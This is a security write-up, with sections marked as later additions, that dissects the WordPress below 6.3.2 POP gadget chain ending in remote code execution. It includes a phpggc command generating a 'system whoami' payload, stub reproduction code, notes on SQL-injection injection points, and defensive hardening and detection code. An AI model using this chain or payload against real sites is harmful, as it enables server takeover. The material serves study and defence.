WordPress POP chain

date
Mar 13, 2024
slug
Reproducing a POP chain in WP
status
Published
tags
PHP
WebSec
TODO
summary
WP POP Chain
type
Post

Preface

Recently I came across a WordPress site during an engagement and realised I had not looked at deserialization (POP) chains in PHP frameworks for a long time, so I went to PHPGGC to see whether it had any "interesting" RCE chains. The WordPress/RCE/1 chain caught my eye and I analysed it carefully. The process is quite interesting.

Description

In WordPress < 6.3.2 there is a deserialization (POP) chain that starts at WP_Theme::__toString and ends in WpOrg\Requests\Hooks::dispatch, where the callbacks stored in the deserialized Hooks object are invoked.
 

Related classes

WP_Block_List class:
WP_Block_List (wp-includes/class-wp-block-list.php) represents a list of block instances. It implements ArrayAccess, Iterator and Countable over its $blocks property. An entry that is still a parsed-block array is not converted eagerly: offsetGet() instantiates a WP_Block from it on first access, passing along the list's $available_context and $registry properties, and stores the object back into $blocks. The class does not register block types; that is the job of WP_Block_Type_Registry. The lazy instantiation in offsetGet() is what makes the class useful as a gadget: indexing a deserialized WP_Block_List with a controlled key constructs a WP_Block from controlled data.
WP_Theme
WP_Theme (wp-includes/class-wp-theme.php) represents a theme: its headers (Name, Version, Template and so on), its template and stylesheet files, and its parent/child relationship. Headers are read through get() and display(), and __toString() returns the Name header, so echoing or string-casting a deserialized WP_Theme is the entry point of the chain.
WP_Block_Type_Registry
WP_Block_Type_Registry holds the registered block types, the WP_Block_Type objects behind Gutenberg blocks, in its $registered_block_types array and exposes register(), unregister(), is_registered() and get_registered($name). A WP_Block asks the registry it was constructed with for its block type by name, so a deserialized registry hands back whatever object was stored under that name.
WpOrg\Requests\Session
WpOrg\Requests\Session belongs to the Requests HTTP library bundled under wp-includes/Requests; it is not a PHP session store. A Session groups HTTP requests that share a base URL, default headers, data and options. Reads and writes of undeclared properties on a Session go through its __get()/__set()/__isset() magic methods, which map them onto the $options array.
WpOrg\Requests\Hooks
WpOrg\Requests\Hooks is the Requests library's hook manager, distinct from WordPress's WP_Hook. register($hook, $callback, $priority) stores callbacks in the $hooks array, grouped by hook name and priority, and dispatch($hook, $parameters) invokes every callback registered under $hook. Because the callbacks of a deserialized Hooks object come straight from its properties, reaching dispatch() becomes a call of an attacker-chosen function such as system(); this is the chain's sink.

Trick

The trick shown here executes the aaa method of the class hello through a name held in a variable rather than a direct call; it comes up constantly in CTF challenges and is also how the chain's sink works.
Variable functions: PHP lets a function be called through a variable that holds its name, so the callee is decided at run time. The same applies to methods ($obj->$name()) and to callable arrays ([$obj, 'method'] or ['Class', 'method']), which call_user_func_array() and the argument spread operator invoke in the same way.
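As an added illustration (not code from the original post), the dynamic-call forms PHP offers, ending with a dispatcher modelled on the shape of WpOrg\Requests\Hooks::dispatch. The class hello and method aaa are the names used above; the hook name and the dispatch() helper are stand-ins of mine, not the library's code.

```php
<?php
// Added illustration of PHP variable functions and callable arrays.
// hello/aaa are the names from the text; everything else is a stand-in.

class hello {
    public function aaa(string $who): string {
        return "hello::aaa called with '$who'";
    }
}

// 1. Variable function: the callee is a string decided at run time.
$func = 'strtoupper';
echo $func('variable function'), "\n";

// 2. Variable method: object and method name both come from variables.
$obj    = new hello();
$method = 'aaa';
echo $obj->$method('variable method'), "\n";

// 3. Callable arrays: [object, 'method'] or ['Class', 'staticMethod'] can be
//    invoked directly (PHP 7+) or through call_user_func_array().
$callback = [$obj, 'aaa'];
echo $callback('callable array'), "\n";
echo call_user_func_array($callback, ['call_user_func_array']), "\n";

// 4. What a hook dispatcher looks like when the callback table is attacker data.
//    Modelled on the shape of Hooks::dispatch (callbacks grouped by hook name
//    and priority); this helper is a stand-in, not the library's code.
function dispatch(array $hooks, string $hook, array $parameters): bool {
    if (empty($hooks[$hook])) {
        return false;
    }
    foreach ($hooks[$hook] as $priority => $hooked) {
        foreach ($hooked as $callback) {
            // A string 'system' here becomes system(...$parameters).
            $callback(...$parameters);
        }
    }
    return true;
}

// With a harmless callback the dispatcher only prints; replace 'printf' with
// 'system' and the parameter with a shell command and you have the sink.
$hooks = ['example.hook' => [0 => ['printf']]];
dispatch($hooks, 'example.hook', ["dispatched with %s\n", 'attacker-controlled callback']);
```

Every form above ends in the same engine call path, which is why a serialized string such as `s:6:"system"` sitting in a callback table is all the sink needs once dispatch() is reached.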
php phpggc WordPress/RCE1 system whoami -u
function call stack
Debugging analysis
Step one:
Start with a test file. It unserializes the payload into $obj, which is a WP_Theme object, and echoes it; using echo on the object triggers its __toString method.
Step two:
Enter the __toString method in wp-includes/class-wp-theme.php. It calls display() with the string 'Name', and display() hands the header name on to get() in the same class.
In get(), $this->headers[$header] looks like an ordinary array read, but $headers is a property restored from the payload and is fully controlled. If it holds an object that implements ArrayAccess, element operations on it are routed to that object's methods: a read calls offsetGet(), isset() calls offsetExists(), and writes and unset() call offsetSet() and offsetUnset(). Here $headers is set to a WP_Block_List object, which implements ArrayAccess, so the read enters WP_Block_List::offsetGet() with $header still equal to 'Name'.
Step three:
Enter the offsetGet method in wp-includes/class-wp-block-list.php. Every property of the WP_Block_List object is likewise controlled. To reach the interesting branch the if condition must hold: $this->blocks must contain a 'Name' key whose value is an array.
When it does, offsetGet instantiates a WP_Block from that array, passing the list's $available_context and $registry along, so the WP_Block constructor runs with attacker-chosen arguments.
….
TBC
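The first three steps as an added, self-contained stand-in that is not WordPress code: the class and property names match wp-includes/class-wp-theme.php and class-wp-block-list.php, the method bodies are reduced to the lines the walkthrough relies on, and the Trace helper and the stub WP_Block (which only records that its constructor ran) are mine. Against a real WordPress checkout the test file is just the last three lines, with wp-load.php included first so the real classes are loaded (assumed setup, not taken from the post).

```php
<?php
// Added stand-in for steps one to three; not WordPress code.

final class Trace {
    public static array $lines = [];
    public static function log(string $line): void { self::$lines[] = $line; }
}

class WP_Block {
    public $name;
    public function __construct(array $block, $available_context, $registry) {
        $this->name = $block['blockName'] ?? null;
        Trace::log("WP_Block::__construct(blockName={$this->name}) with controlled context/registry");
        // The real constructor goes on to $registry->get_registered($this->name);
        // the rest of the chain lives there and is out of scope for this stub.
    }
    // Stub only: lets the (string) cast in WP_Theme::__toString return cleanly.
    public function __toString(): string { return ''; }
}

class WP_Block_List implements ArrayAccess {
    public $blocks = [];
    public $available_context = [];
    public $registry = null;

    public function offsetExists($index): bool {
        Trace::log("WP_Block_List::offsetExists('$index')");
        return isset($this->blocks[$index]);
    }
    // Lazy instantiation: an entry that is still an array becomes a WP_Block,
    // built from the list's own (deserialized, controlled) properties.
    #[\ReturnTypeWillChange]
    public function offsetGet($index) {
        Trace::log("WP_Block_List::offsetGet('$index')");
        $block = $this->blocks[$index] ?? null;
        if (isset($block) && is_array($block)) {
            $block = new WP_Block($block, $this->available_context, $this->registry);
            $this->blocks[$index] = $block;
        }
        return $block;
    }
    public function offsetSet($index, $value): void { $this->blocks[$index] = $value; }
    public function offsetUnset($index): void { unset($this->blocks[$index]); }
}

class WP_Theme {
    public $headers = [];
    public function __toString(): string {
        Trace::log('WP_Theme::__toString()');
        return (string) $this->display('Name');
    }
    public function display($header) {
        Trace::log("WP_Theme::display('$header')");
        return $this->get($header);
    }
    public function get($header) {
        Trace::log("WP_Theme::get('$header')");
        // When $headers is an ArrayAccess object, isset() calls offsetExists()
        // and the read calls offsetGet(); neither looks like a method call.
        if (!isset($this->headers[$header])) {
            return false;
        }
        return $this->headers[$header];
    }
}

// Build the object graph the way a payload generator does, then round-trip it.
function build_payload(): string {
    $list = new WP_Block_List();
    $list->blocks = ['Name' => ['blockName' => 'core/paragraph', 'attrs' => []]];
    $theme = new WP_Theme();
    $theme->headers = $list;            // the ArrayAccess object in place of an array
    return serialize($theme);
}

$obj = unserialize(build_payload());   // $obj is a WP_Theme
echo $obj;                             // echo -> __toString, the chain's entry point
echo implode("\n", Trace::$lines), "\n";
```

The printed trace is the call stack of the first three steps: __toString, display('Name'), get('Name'), offsetExists('Name'), offsetGet('Name'), then the WP_Block constructor. Change the 'Name' entry in $blocks to a non-array value and the trace stops at offsetGet, which is the if condition step three talks about.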

Trigger

First, a deserialization sink is needed. WordPress's maybe_unserialize() unserializes any stored value that is_serialized() accepts, and it is applied to options, metadata and similar values as they are read back from the database:
function maybe_unserialize( $data ) {
    if ( is_serialized( $data ) ) { // Don't attempt to unserialize data that wasn't serialized going in.
        return @unserialize( trim( $data ) );
    }
    return $data;
}
Payload injection point:
In general the payload has to land in the database, typically through an SQL injection. As the wpscan report notes, an SQL injection that inserts rows into wp_termmeta is enough: the inserted metadata is passed through maybe_unserialize() when the term meta is retrieved, which triggers the chain and leads to RCE.
In practice, setting fields such as the administrator's user name or the site name to a malicious payload can reach the same sink and cause RCE.
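An added example, not WordPress code, showing the sink shape above next to the check and the hardening a practitioner would want: a simplified stand-in for is_serialized() (assumption: only the type prefixes WordPress accepts matter here, the real function also validates the tail of the string), the vulnerable and a hardened maybe_unserialize(), and a scan over constructed option-like rows for values that embed serialized objects. The sample rows and the stub WP_Theme/WP_Block_List classes are constructed for the demo.

```php
<?php
// Added example: sink shape, hardened variant, and a scan for planted objects.

// Simplified stand-in for is_serialized(): accepts the prefixes WordPress does.
function looks_serialized(string $data): bool {
    $data = trim($data);
    if ($data === 'N;') {
        return true;
    }
    if (strlen($data) < 4 || $data[1] !== ':') {
        return false;
    }
    return (bool) preg_match('/^[aOsbid]:/', $data);
}

// Shape of the vulnerable sink: every class is allowed, so __wakeup, __destruct
// and __toString of any loaded class become reachable from stored data.
function maybe_unserialize_unsafe(string $data) {
    if (looks_serialized($data)) {
        return @unserialize(trim($data));
    }
    return $data;
}

// Hardened variant: scalars and arrays round-trip normally, but every O: segment
// is rebuilt as __PHP_Incomplete_Class, whose magic methods are not the gadgets'.
function maybe_unserialize_safe(string $data) {
    if (looks_serialized($data)) {
        return @unserialize(trim($data), ['allowed_classes' => false]);
    }
    return $data;
}

// Detection: report rows whose serialized value embeds objects, flagging the
// chain's entry classes. $watch is a starting list, not a complete one.
function find_serialized_objects(array $rows, array $watch = ['WP_Theme', 'WP_Block_List']): array {
    $hits = [];
    foreach ($rows as $key => $value) {
        if (!is_string($value) || !looks_serialized($value)) {
            continue;
        }
        if (preg_match_all('/O:\d+:"([^"]+)"/', $value, $m)) {
            $classes = array_values(array_unique($m[1]));
            $hits[$key] = [
                'classes' => $classes,
                'suspect' => (bool) array_intersect($classes, $watch),
            ];
        }
    }
    return $hits;
}

// Stub gadget classes so the unsafe path has something to instantiate.
class WP_Theme {
    public $headers;
    public function __toString(): string { return 'WP_Theme::__toString reached'; }
}
class WP_Block_List { public $blocks; }

// Constructed sample rows, shaped like wp_options / wp_termmeta values.
$rows = [
    'blogname'        => 'My Site',
    'widget_settings' => serialize(['title' => 'Recent posts', 'count' => 5]),
    'planted_meta'    => 'O:8:"WP_Theme":1:{s:7:"headers";O:13:"WP_Block_List":1:{s:6:"blocks";a:0:{}}}',
];

var_dump(maybe_unserialize_unsafe($rows['planted_meta']) instanceof WP_Theme);               // true
var_dump(maybe_unserialize_safe($rows['planted_meta']) instanceof __PHP_Incomplete_Class);  // true
var_dump(maybe_unserialize_safe($rows['widget_settings'])['count']);                         // int(5)
print_r(find_serialized_objects($rows));   // only planted_meta, with suspect => true
```

The allowed_classes variant is shown to make the point that the sink is only dangerous because real classes are rebuilt; it is not a drop-in patch for WordPress, which legitimately stores serialized objects in places and would break. The scan is the practical check: run it over wp_options.option_value and the *meta tables' meta_value columns and look at any row whose value contains an O: token you did not expect.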

© Amine Elsassi 2021 - 2024